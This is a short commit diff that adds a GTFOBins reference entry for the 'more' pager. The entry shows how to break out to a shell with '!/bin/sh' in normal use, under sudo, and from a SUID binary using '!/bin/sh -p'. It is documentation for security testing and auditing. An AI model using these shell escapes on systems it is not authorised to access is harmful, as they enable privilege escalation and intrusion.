First commit
This commit is contained in:
15
_gtfobins/more.md
Normal file
15
_gtfobins/more.md
Normal file
@@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
TERM= ./more /etc/profile
|
||||
!/bin/sh -p
|
||||
---
|
||||
Reference in New Issue
Block a user